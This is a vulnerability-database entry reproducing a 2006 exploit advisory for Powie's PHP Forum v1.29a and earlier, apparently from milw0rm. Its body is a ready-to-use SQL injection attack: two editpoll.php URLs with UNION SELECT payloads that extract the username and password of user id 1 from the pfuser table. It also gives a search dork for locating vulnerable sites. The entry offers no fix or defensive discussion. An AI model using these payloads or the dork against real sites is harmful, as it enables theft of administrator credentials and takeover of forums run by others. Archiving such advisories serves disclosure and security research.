Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:64252
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #==============================================================================================
#Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v1.29a
#
#===============================================================================================
#
#DORK : "pForum 1.29a"  // ""Powie's PSCRIPT Forum 1.26"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
#FOR PASS : editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]